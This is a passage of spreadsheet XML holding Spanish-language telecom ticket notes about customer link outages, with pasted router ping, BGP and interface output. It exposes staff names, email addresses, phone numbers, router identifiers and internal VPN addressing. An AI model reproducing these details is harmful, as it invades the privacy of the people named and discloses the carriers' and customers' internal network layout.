DE: JIMMY ESPINOZA [MAILTO:JIMMY.ESPINOZA@DIANA.COM.SV]
ENVIADO EL: VIERNES, 10 DE JUNIO DE 2022 01:08
PARA: IVAN JOSE MEJIA PETZ &lt;IVAN.MEJIA@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; JEREMIAS MARTINEZ &lt;JEREMIAS.MARTINEZ@DIANA.COM.SV&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; MAURO ACOSTA &lt;MAURO.ACOSTA@DIANA.COM.SV&gt;; WALTER GAMERO &lt;WALTER.GAMERO@DIANA.COM.SV&gt;; PERLA MARINA ESTRADA PACAY &lt;PERLA.ESTRADA@CLARO.COM.GT&gt;
ASUNTO: RE: [ EXTERNO ]CAÍDA TOTAL ENLACE 395000005
BUENAS NOCHES,
COMPARTO CONTACTO:
JEREMÍAS MARTÍNEZ
+50255774432
@JEREMIAS MARTINEZ</t>
  </si>
  <si>
    <t>F4596569</t>
  </si>
  <si>
    <t>SERVICIO OPERATIVO NO SE TIENE EVENTOS A NIVEL LOGICO SE ADJUNTA EVIDENCIA Y SE POCEDERA A VAÑIDAR CON EL CLIENTE CON EL CLIENTE
&lt;PPANPAC0N2T1A01A01EID1&gt;PING  -VP SCOTIABANK_TIER3_MNC 10.17.99.173
  PING 10.17.99.173: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.17.99.173: BYTES=56 SEQUENCE=1 TTL=255 TIME=1 MS
    REPLY FROM 10.17.99.173: BYTES=56 SEQUENCE=2 TTL=255 TIME=1 MS
    REPLY FROM 10.17.99.173: BYTES=56 SEQUENCE=3 TTL=255 TIME=1 MS
    REPLY FROM 10.17.99.173: BYTES=56 SEQUENCE=4 TTL=255 TIME=1 MS
    REPLY FROM 10.17.99.173: BYTES=56 SEQUENCE=5 TTL=255 TIME=1 MS
  --- 10.17.99.173 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
&lt;PPANPAC0N2T1A01A01EID1&gt;DISPLAY BGP VPNV4 VP  SCOTIABANK_TIER3_MNC PEER | IN 10.                                                                                        17.99.173
INFO: IT WILL TAKE A LONG TIME IF THE CONTENT YOU SEARCH IS TOO MUCH OR THE STRI                                                                                        NG YOU INPUT IS TOO LONG, YOU CAN PRESS CTRL_C TO BREAK.
 BGP LOCAL ROUTER ID : 10.179.38.7
 LOCAL AS NUMBER : 14754
 VPN-INSTANCE SCOTIABANK_TIER3_MNC, ROUTER ID 10.179.38.7:
 TOTAL NUMBER OF PEERS : 13                 PEERS IN ESTABLISHED STATE : 13
  PEER                             V          AS  MSGRCVD  MSGSENT  OUTQ  UP/DOW                                                                                        N       STATE  PREFRCV
  10.17.99.173                     4       64594   111064   117939     0 1681H24                                                                                        M ESTABLISHED        6
&lt;PPANPAC0N2T1A01A01EID1&gt;
PE 19.179.38.7
&lt;PPANPAC0N2T1A01A01EID1&gt;DISP IP ROUTI VP  SCOTIABANK_TIER3_MNC 10.17.99.173
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE                                                                                         ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : SCOTIABANK_TIER3_MNC
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.17.99.172/30  DIRECT  0    0             D   10.17.99.174    GIGABITETHERN                                                                                        ET1/0/10.1023</t>
  </si>
  <si>
    <t>F4596573</t>
  </si>
  <si>
    <t>SE PROCEDERA A VALIDAR CON EL CLIENTE DESPUES DE REALIZAR PRUEBAS
&lt;PPANPAC0N2T1A01A01EID1&gt;DIS IP ROUTING-TABLE VPN-INSTANCE SCOTIABANK_TIER3_MNC 10.17.99.141
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : SCOTIABANK_TIER3_MNC
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.17.99.140/30  DIRECT  0    0             D   10.17.99.142    GIGABITETHERNET3/0/8.1019
&lt;PPANPAC0N2T1A01A01EID1&gt;DIS CUR INTER GIGABITETHERNET3/0/8.1019
#
INTERFACE GIGABITETHERNET3/0/8.1019
 VLAN-TYPE DOT1Q 1019
 DESCRIPTION ROUTER_DAVID_TIER3
 IP BINDING VPN-INSTANCE SCOTIABANK_TIER3_MNC
 IP ADDRESS 10.17.99.142 255.255.255.252
 STATISTIC ENABLE
 TRAFFIC-POLICY BW_IN_10MBPS_PB_12_IN INBOUND
 TRAFFIC-POLICY PB_12_OUT OUTBOUND
 TRUST UPSTREAM DEFAULT
 QOS-PROFILE RATE_LIMIT_10MBPS INBOUND IDENTIFIER NONE
#
RETURN
&lt;PPANPAC0N2T1A01A01EID1&gt;
&lt;PPANPAC0N2T1A01A01EID1&gt;PIN -VPN-INSTANCE SCOTIABANK_TIER3_MNC 10.17.99.141       PING 10.17.99.141: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.17.99.141: BYTES=56 SEQUENCE=1 TTL=255 TIME=7 MS
    REPLY FROM 10.17.99.141: BYTES=56 SEQUENCE=2 TTL=255 TIME=7 MS
    REPLY FROM 10.17.99.141: BYTES=56 SEQUENCE=3 TTL=255 TIME=6 MS
    REPLY FROM 10.17.99.141: BYTES=56 SEQUENCE=4 TTL=255 TIME=6 MS
    REPLY FROM 10.17.99.141: BYTES=56 SEQUENCE=5 TTL=255 TIME=6 MS
  --- 10.17.99.141 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 6/6/7 MS
&lt;PPANPAC0N2T1A01A01EID1&gt;</t>
  </si>
  <si>
    <t>F4596574</t>
  </si>
  <si>
    <t>*** SE ENVÍA CORREO A CLIENTE, Y SE QUEDA A LA ESPERA DE QUE PUDIERAN REALIZAR LOS DESCARTES DE PRIMER LÍNEA ***
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 10 DE JUNIO DE 2022 8:08
PARA: EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; CRLAAMNOC MAILBOX &lt;CRLAAMNOC_MAILBOX@DXC.COM&gt;; ROBERTO TOMAS GARCIA GRAMAJO &lt;ROBERTO.GARCIA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CAMACHO SOTO, MARCO VINICIO &lt;M.CAMACHOSOTO@DXC.COM&gt;; MELENDEZ ALVAREZ, SOFIA &lt;S.MELENDEZALVAREZ@DXC.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; PACHECO, JEAN CARLOS &lt;JEAN-CARLOS.PACHECO.PALACIOS@DXC.COM&gt;; JUAN JOSE VELIZ CERON &lt;JUAN.VELIZ@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; YENSI SUCELY CALGUA MATEO &lt;YENSI.CALGUA@CLARO.COM.GT&gt;
ASUNTO: RE: FENSA | INC23587989| COCA COLA FEMSA-COSTA RICA-LIBERIA-DISTRIBUIDORA
ESTIMADOS BUEN DÍA,
SE REQUIERE QUE REALICEN LOS RESPECTIVOS DESCARTES DE PRIMER NIVEL (ENERGÍA, CONEXIONES O INHIBICIÓN DE EQUIPO) EN LA SEDE. SI UNA VEZ REALIZANDO LO ANTERIOR CONTINÚAN CON EL INCONVENIENTE POR FAVOR COMPARTIR LOS SIGUIENTES DATOS EN CASO SE REQUIERA UNA VISITA TÉCNICA.
*CONTACTO LOCAL
*DIRECCIÓN DEL SITIO
*HORARIO DE ATENCIÓN
*REGISTRO FOTOGRÁFICO DEL EQUIPO
CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, A LA ESPERA DE VALIDACION.
RE: FENSA | INC23587989| COCA COLA FEMSA-COSTA RICA-LIBERIA-DISTRIBUIDORA</t>
  </si>
  <si>
    <t>***--- CL INDICA QUE EL PERSONAL EN SITIO INGRESA A LAS 08:00 HRS Y NOS COMPARTIRAN EL DATO A PARTIR DE ESA HORA --***
DE: CRLAAMNOC MAILBOX [MAILTO:CRLAAMNOC_MAILBOX@DXC.COM]
ENVIADO EL: VIERNES, 10 DE JUNIO DE 2022 02:43
PARA: ROBERTO TOMAS GARCIA GRAMAJO &lt;ROBERTO.GARCIA@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CAMACHO SOTO, MARCO VINICIO &lt;M.CAMACHOSOTO@DXC.COM&gt;; MELENDEZ ALVAREZ, SOFIA &lt;S.MELENDEZALVAREZ@DXC.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; PACHECO, JEAN CARLOS &lt;JEAN-CARLOS.PACHECO.PALACIOS@DXC.COM&gt;; JUAN JOSE VELIZ CERON &lt;JUAN.VELIZ@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; YENSI SUCELY CALGUA MATEO &lt;YENSI.CALGUA@CLARO.COM.GT&gt;
ASUNTO: RE: FENSA | INC23587989| COCA COLA FEMSA-COSTA RICA-LIBERIA-DISTRIBUIDORA
BUENOS DIAS,
SE HABLA CON ENCARGADO DE LA ZONA, INFORMA QUE PARA LO SOLICITADO SERIA DESPUÉS DE LAS 8AM QUE INGRESA EL PERSONAL A SITIO. UNA VEZ QUE SE REALICE LE ESTAREMOS INFORMANDO.
SALUDOS</t>
  </si>
  <si>
    <t>F4596580</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5290 CONTESTA EL SEÑOR EMILIO QUIEN CONFIRMA QUE DE SU LADO YA FUE CERRADO POR SU COMPAÑERO CARLOS CASTAÑEDA Y AUTORIZA CIERRE DE TICKET**
-ID 2001369390
**</t>
  </si>
  <si>
    <t>F4596583</t>
  </si>
  <si>
    <t>SE LLAMÓ A PR 506 71134593 / 506 70191297 PARA SEGUIMIENTO, NO CONTESTA; SE HABLÓ CON DIEGO MORA/CENTRAL 2243-7253 SE LE PIDE TELS ADICIONALES, INDICA CONSEGUIRÁ Y SE LE LLAME EN 35/40 MINUTOS PARA APOYO Y QUE SE PREGUNTÉ POR ÉL.</t>
  </si>
  <si>
    <t>F4596593</t>
  </si>
  <si>
    <t>F4596596</t>
  </si>
  <si>
    <t>F4596597</t>
  </si>
  <si>
    <t>SERVICIO OPERATIVO SE PROCEDERA A VALIDAR CON EL CLIENTE
&lt;PPANPAC0N2T1A01A01EID1&gt;PIN -VP BIMBO_VPN_MNC 10.88.9.125
  PING 10.88.9.125: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.88.9.125: BYTES=56 SEQUENCE=1 TTL=255 TIME=2 MS
    REPLY FROM 10.88.9.125: BYTES=56 SEQUENCE=2 TTL=255 TIME=1 MS
    REPLY FROM 10.88.9.125: BYTES=56 SEQUENCE=3 TTL=255 TIME=2 MS
    REPLY FROM 10.88.9.125: BYTES=56 SEQUENCE=4 TTL=255 TIME=1 MS
    REPLY FROM 10.88.9.125: BYTES=56 SEQUENCE=5 TTL=255 TIME=1 MS
  --- 10.88.9.125 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/2 MS
&lt;PPANPAC0N2T1A01A01EID1&gt;DISPLAY BGP VPNV4 VPN-INSTANCE BIMBO_VPN_MNC  PEER | I 10.88.9.125
INFO: IT WILL TAKE A LONG TIME IF THE CONTENT YOU SEARCH IS TOO MUCH OR THE STRING YOU INPUT IS TOO LONG, YOU CAN PRESS CTRL_C TO BREAK.
 BGP LOCAL ROUTER ID : 10.179.38.7
 LOCAL AS NUMBER : 14754
 VPN-INSTANCE BIMBO_VPN_MNC, ROUTER ID 10.179.38.7:
 TOTAL NUMBER OF PEERS : 7                 PEERS IN ESTABLISHED STATE : 5
  PEER                             V          AS  MSGRCVD  MSGSENT  OUTQ  UP/DOWN       STATE  PREFRCV
  10.88.9.125                      4       64552      707      762     0 10:08:58 ESTABLISHED        3
&lt;PPANPAC0N2T1A01A01EID1&gt;
PE 10.179.38.7
&lt;PPANPAC0N2T1A01A01EID1&gt;DIS IP ROUTING-TABLE VP BIMBO_VPN_MNC 10.88.9.125
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : BIMBO_VPN_MNC
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
    10.88.9.124/30  DIRECT  0    0             D   10.88.9.126     GIGABITETHERNET3/0/8.1037
&lt;PPANPAC0N2T1A01A01EID1&gt;DIS CUR INTER GIGABITETHERNET3/0/8.1037
#
INTERFACE GIGABITETHERNET3/0/8.1037
 VLAN-TYPE DOT1Q 1037
 DESCRIPTION ROUTER_BIMB-ARRAIJAN-VPN_MNC
 IP BINDING VPN-INSTANCE BIMBO_VPN_MNC
 IP ADDRESS 10.88.9.126 255.255.255.252
 STATISTIC ENABLE
 TRAFFIC-POLICY BW_IN_5MBPS_PB_1_IN INBOUND
 TRAFFIC-POLICY PB_1_OUT OUTBOUND
 TRUST UPSTREAM DEFAULT
 QOS-PROFILE RATE_LIMIT_5MBPS INBOUND IDENTIFIER NONE
#
RETURN</t>
  </si>
  <si>
    <t>F4596600</t>
  </si>
  <si>
    <t>F4596601</t>
  </si>
  <si>
    <t>ENLACES OPERATIVOS POR PARTE DE CLARO NO SE TIENE EVENTO EN EL BGP SE PROCEDE A VALIDAR CON EL CLIENTE POR CORREO CONJUNTAMENTE CON LOS COMPAÑEROS.
&lt;PPANPAC0N2T1A01A01EID1&gt;PIN -VP BIMBO_VPN_MNC 10.88.9.125
  PING 10.88.9.125: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.88.9.125: BYTES=56 SEQUENCE=1 TTL=255 TIME=2 MS
    REPLY FROM 10.88.9.125: BYTES=56 SEQUENCE=2 TTL=255 TIME=1 MS
    REPLY FROM 10.88.9.125: BYTES=56 SEQUENCE=3 TTL=255 TIME=2 MS
    REPLY FROM 10.88.9.125: BYTES=56 SEQUENCE=4 TTL=255 TIME=1 MS
    REPLY FROM 10.88.9.125: BYTES=56 SEQUENCE=5 TTL=255 TIME=1 MS
  --- 10.88.9.125 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/2 MS
PE 10.179.38.2
&lt;PPANPAC0N2T1A01A01EID1&gt;DISPLAY BGP VPNV4 VPN-INSTANCE BIMBO_VPN_MNC  PEER | I 10.88.9.125
INFO: IT WILL TAKE A LONG TIME IF THE CONTENT YOU SEARCH IS TOO MUCH OR THE STRING YOU INPUT IS TOO LONG, YOU CAN PRESS CTRL_C TO BREAK.
 BGP LOCAL ROUTER ID : 10.179.38.7
 LOCAL AS NUMBER : 14754
 VPN-INSTANCE BIMBO_VPN_MNC, ROUTER ID 10.179.38.7:
 TOTAL NUMBER OF PEERS : 7                 PEERS IN ESTABLISHED STATE : 5
  PEER                             V          AS  MSGRCVD  MSGSENT  OUTQ  UP/DOWN       STATE  PREFRCV
  10.88.9.125                      4       64552      707      762     0 10:08:58 ESTABLISHED        3
&lt;PPANPAC0N2T1A01A01EID1&gt;
&lt;PPANPAC0N2T1A01A01EID1&gt;
&lt;PPANPAC0N2T1A01A01EID1&gt;DIS IP ROUTING-TABLE VP BIMBO_VPN_MNC 10.88.9.133
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : BIMBO_VPN_MNC
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
    10.88.9.132/30  DIRECT  0    0             D   10.88.9.134     GIGABITETHERNET3/0/8.1038
&lt;PPANPAC0N2T1A01A01EID1&gt;DIS CUR INTER  GIGABITETHERNET3/0/8.1038
#
INTERFACE GIGABITETHERNET3/0/8.1038
 VLAN-TYPE DOT1Q 1038
 DESCRIPTION ROUTER_BIMB-AGUADULCE-VPN_MNC
 IP BINDING VPN-INSTANCE BIMBO_VPN_MNC
 IP ADDRESS 10.88.9.134 255.255.255.252
 STATISTIC ENABLE
 TRAFFIC-POLICY BW_IN_10MBPS_PB_1_IN INBOUND
 TRAFFIC-POLICY PB_1_OUT OUTBOUND
 TRUST UPSTREAM DEFAULT
 QOS-PROFILE RATE_LIMIT_10MBPS INBOUND IDENTIFIER NONE
#
RETURN
&lt;PPANPAC0N2T1A01A01EID1&gt;DISPLAY BGP VPNV4 VPN-INSTANCE BIMBO_INT 10.88.9.133
                                                                 ^
ERROR: UNRECOGNIZED COMMAND FOUND AT '^' POSITION.
&lt;PPANPAC0N2T1A01A01EID1&gt;DISPLAY BGP VPNV4 VPN-INSTANCE BIMBO_VPN_MNC  PEER | I 10.88.9.133
INFO: IT WILL TAKE A LONG TIME IF THE CONTENT YOU SEARCH IS TOO MUCH OR THE STRING YOU INPUT IS TOO LONG, YOU CAN PRESS CTRL_C TO BREAK.
 BGP LOCAL ROUTER ID : 10.179.38.7
 LOCAL AS NUMBER : 14754
 VPN-INSTANCE BIMBO_VPN_MNC, ROUTER ID 10.179.38.7:
 TOTAL NUMBER OF PEERS : 7                 PEERS IN ESTABLISHED STATE : 5
  PEER                             V          AS  MSGRCVD  MSGSENT  OUTQ  UP/DOWN       STATE  PREFRCV
  10.88.9.133                      4       64552    56099    60039     0 0839H56M ESTABLISHED        3
&lt;PPANPAC0N2T1A01A01EID1&gt;DIS CUR INTER  GIGABITETHERNET3/0/8.1038
#
INTERFACE GIGABITETHERNET3/0/8.1038
 VLAN-TYPE DOT1Q 1038
 DESCRIPTION ROUTER_BIMB-AGUADULCE-VPN_MNC
 IP BINDING VPN-INSTANCE BIMBO_VPN_MNC
 IP ADDRESS 10.88.9.134 255.255.255.252
 STATISTIC ENABLE
 TRAFFIC-POLICY BW_IN_10MBPS_PB_1_IN INBOUND
 TRAFFIC-POLICY PB_1_OUT OUTBOUND
 TRUST UPSTREAM DEFAULT
 QOS-PROFILE RATE_LIMIT_10MBPS INBOUND IDENTIFIER NONE
#
RETURN
&lt;PPANPAC0N2T1A01A01EID1&gt;DIS IP ROUTING-TABLE VP BIMBO_VPN_MNC 10.88.9.133
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : BIMBO_VPN_MNC
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
    10.88.9.132/30  DIRECT  0    0             D   10.88.9.134     GIGABITETHERNET3/0/8.1038
&lt;PPANPAC0N2T1A01A01EID1&gt;PIN -VP BIMBO_VPN_MNC 10.88.9.133
  PING 10.88.9.133: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.88.9.133: BYTES=56 SEQUENCE=1 TTL=255 TIME=5 MS
    REPLY FROM 10.88.9.133: BYTES=56 SEQUENCE=2 TTL=255 TIME=5 MS
    REPLY FROM 10.88.9.133: BYTES=56 SEQUENCE=3 TTL=255 TIME=4 MS
    REPLY FROM 10.88.9.133: BYTES=56 SEQUENCE=4 TTL=255 TIME=4 MS
    REPLY FROM 10.88.9.133: BYTES=56 SEQUENCE=5 TTL=255 TIME=4 MS
  --- 10.88.9.133 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 4/4/5 MS
&lt;PPANPAC0N2T1A01A01EID1&gt;</t>
  </si>
  <si>
    <t>F4596602</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5299 CONTESTA EL SEÑOR OSWALDO HERNANDEZ INFORMA QUE SE PUEDE PROCEDER AL CIERRE DEL TICKET YA QUE YA FUE CERRADO POR SU COMPAÑERO EMILIO CASTAÑEDA**
ID 2001413527
**</t>
  </si>
  <si>
    <t>F4596606</t>
  </si>
  <si>
    <t>SERVICIOS OPERATIVOS POR  ENE EL MOMENTO QUE SER REVISARON A NIVEL DE BGP NO SE VEN EVENTOS RECIENTE
&lt;PPANPAC0N2T1A01A01EID1&gt;PIN -VP BIMBO_VPN_MNC 10.88.9.101
  PING 10.88.9.101: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.88.9.101: BYTES=56 SEQUENCE=1 TTL=255 TIME=1 MS
    REPLY FROM 10.88.9.101: BYTES=56 SEQUENCE=2 TTL=255 TIME=1 MS
    REPLY FROM 10.88.9.101: BYTES=56 SEQUENCE=3 TTL=255 TIME=1 MS
    REPLY FROM 10.88.9.101: BYTES=56 SEQUENCE=4 TTL=255 TIME=1 MS
    REPLY FROM 10.88.9.101: BYTES=56 SEQUENCE=5 TTL=255 TIME=1 MS
  --- 10.88.9.101 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
&lt;PPANPAC0N2T1A01A01EID1&gt;DISPLAY BGP VPNV4 VPN-INSTANCE BIMBO_VPN_MNC  PEER | I 10.88.9.101
INFO: IT WILL TAKE A LONG TIME IF THE CONTENT YOU SEARCH IS TOO MUCH OR THE STRING YOU INPUT IS TOO LONG, YOU CAN PRESS CTRL_C TO BREAK.
 BGP LOCAL ROUTER ID : 10.179.38.7
 LOCAL AS NUMBER : 14754
 VPN-INSTANCE BIMBO_VPN_MNC, ROUTER ID 10.179.38.7:
 TOTAL NUMBER OF PEERS : 7                 PEERS IN ESTABLISHED STATE : 5
  PEER                             V          AS  MSGRCVD  MSGSENT  OUTQ  UP/DOWN       STATE  PREFRCV
  10.88.9.101                      4       64552   112400   120216     0 1682H10M ESTABLISHED      501
PE 10.179.38.7
&lt;PPANPAC0N2T1A01A01EID1&gt;DISPLAY IP ROUTING-TABLE VP BIMBO_VPN_MNC VERBOSE
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : BIMBO_VPN_MNC
         DESTINATIONS : 537      ROUTES : 537
DESTINATION: 0.0.0.0/0
     PROTOCOL: EBGP               PROCESS ID: 0
   PREFERENCE: 20                       COST: 0
      NEXTHOP: 10.88.9.101         NEIGHBOUR: 10.88.9.101
        STATE: ACTIVE ADV RELIED         AGE: 01H22M48S
          TAG: 0                    PRIORITY: CRITICAL
        LABEL: NULL                  QOSINFO: 0X0
   INDIRECTID: 0X1000558            INSTANCE:
 RELAYNEXTHOP: 10.88.9.101         INTERFACE: GIGABITETHERNET3/0/8.1034
     TUNNELID: 0X0                     FLAGS: RD
DESTINATION: 10.0.0.0/8
     PROTOCOL: EBGP               PROCESS ID: 0
   PREFERENCE: 20                       COST: 0
      NEXTHOP: 10.88.9.101         NEIGHBOUR: 10.88.9.101
        STATE: ACTIVE ADV RELIED         AGE: 00H36M22S
          TAG: 0                    PRIORITY: LOW
        LABEL: NULL                  QOSINFO: 0X0
&lt;PPANPAC0N2T1A01A01EID1&gt;DIS IP ROUTING-TABLE VP BIMBO_VPN_MNC 10.88.9.101
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : BIMBO_VPN_MNC
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
    10.88.9.100/30  DIRECT  0    0             D   10.88.9.102     GIGABITETHERNET3/0/8.1034
&lt;PPANPAC0N2T1A01A01EID1&gt;DIS CUR INTER  GIGABITETHERNET3/0/8.1034
#
INTERFACE GIGABITETHERNET3/0/8.1034
 VLAN-TYPE DOT1Q 1034
 DESCRIPTION ROUTER_BIMB-CARRASQUILLA-VPN_MNC
 IP BINDING VPN-INSTANCE BIMBO_VPN_MNC
 IP ADDRESS 10.88.9.102 255.255.255.252
 STATISTIC ENABLE
 TRAFFIC-POLICY BW_IN_50MBPS_PB_1_IN INBOUND
 TRAFFIC-POLICY PB_1_OUT OUTBOUND
 TRUST UPSTREAM DEFAULT
 QOS-PROFILE RATE_LIMIT_50MBPS INBOUND IDENTIFIER NONE
#
RETURN
&lt;PPANPAC0N2T1A01A01EID1&gt;</t>
  </si>
  <si>
    <t>F4596607</t>
  </si>
  <si>
    <t>F4596609</t>
  </si>
  <si>
    <t>ENALCE OPERATIVO A NIVEL DE BGP SE PROCEDE A VALIDAR CON EL CLIENTE POR PARTE LOS ENLACES.
&lt;PPANPAC0N2T1A01A01EID1&gt;DISPLAY BGP VPNV4 VPN-INSTANCE SCOTIABANK_TIER3_MNC  PEER | I 10.17.99.237
INFO: IT WILL TAKE A LONG TIME IF THE CONTENT YOU SEARCH IS TOO MUCH OR THE STRING YOU INPUT IS TOO LONG, YOU CAN PRESS CTRL_C TO BREAK.
 BGP LOCAL ROUTER ID : 10.179.38.7
 LOCAL AS NUMBER : 14754
 VPN-INSTANCE SCOTIABANK_TIER3_MNC, ROUTER ID 10.179.38.7:
 TOTAL NUMBER OF PEERS : 13                 PEERS IN ESTABLISHED STATE : 13
  PEER                             V          AS  MSGRCVD  MSGSENT  OUTQ  UP/DOWN       STATE  PREFRCV
  10.17.99.237                     4       64594    58744    62359     0 0889H51M ESTABLISHED        5
&lt;PPANPAC0N2T1A01A01EID1&gt;PIN -VP SCOTIABANK_TIER3_MNC 10.17.99.237
  PING 10.17.99.237: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.17.99.237: BYTES=56 SEQUENCE=1 TTL=255 TIME=6 MS
    REPLY FROM 10.17.99.237: BYTES=56 SEQUENCE=2 TTL=255 TIME=7 MS
    REPLY FROM 10.17.99.237: BYTES=56 SEQUENCE=3 TTL=255 TIME=7 MS
    REPLY FROM 10.17.99.237: BYTES=56 SEQUENCE=4 TTL=255 TIME=7 MS
    REPLY FROM 10.17.99.237: BYTES=56 SEQUENCE=5 TTL=255 TIME=7 MS
  --- 10.17.99.237 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 6/6/7 MS
&lt;PPANPAC0N2T1A01A01EID1&gt;DIS IP ROUTI
&lt;PPANPAC0N2T1A01A01EID1&gt;DIS IP ROUTING-TABLE VP SCOTIABANK_TIER3_MNC 10.17.99.237 VER
&lt;PPANPAC0N2T1A01A01EID1&gt;DIS IP ROUTING-TABLE VP SCOTIABANK_TIER3_MNC 10.17.99.237 VERBOSE
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : SCOTIABANK_TIER3_MNC
SUMMARY COUNT : 1
DESTINATION: 10.17.99.236/30
     PROTOCOL: DIRECT             PROCESS ID: 0
   PREFERENCE: 0                        COST: 0
      NEXTHOP: 10.17.99.238        NEIGHBOUR: 0.0.0.0
        STATE: ACTIVE ADV                AGE: 70D02H16M45S
          TAG: 0                    PRIORITY: CRITICAL
        LABEL: NULL                  QOSINFO: 0X0
   INDIRECTID: 0X1000393            INSTANCE:
 RELAYNEXTHOP: 0.0.0.0             INTERFACE: GIGABITETHERNET3/0/8.1031
     TUNNELID: 0X0                     FLAGS: D
&lt;PPANPAC0N2T1A01A01EID1&gt;
PE 10.179.38.7
&lt;PPANPAC0N2T1A01A01EID1&gt;DIS IP ROUTING-TABLE VP SCOTIABANK_TIER3_MNC 10.17.99.237
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : SCOTIABANK_TIER3_MNC
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.17.99.236/30  DIRECT  0    0             D   10.17.99.238    GIGABITETHERNET3/0/8.1031
&lt;PPANPAC0N2T1A01A01EID1&gt;DIS CUR INTE  GIGABITETHERNET3/0/8.1031
#
INTERFACE GIGABITETHERNET3/0/8.1031
 VLAN-TYPE DOT1Q 1031
 DESCRIPTION ROUTER_BOQUETE_TIER3
 IP BINDING VPN-INSTANCE SCOTIABANK_TIER3_MNC
 IP ADDRESS 10.17.99.238 255.255.255.252
 STATISTIC ENABLE
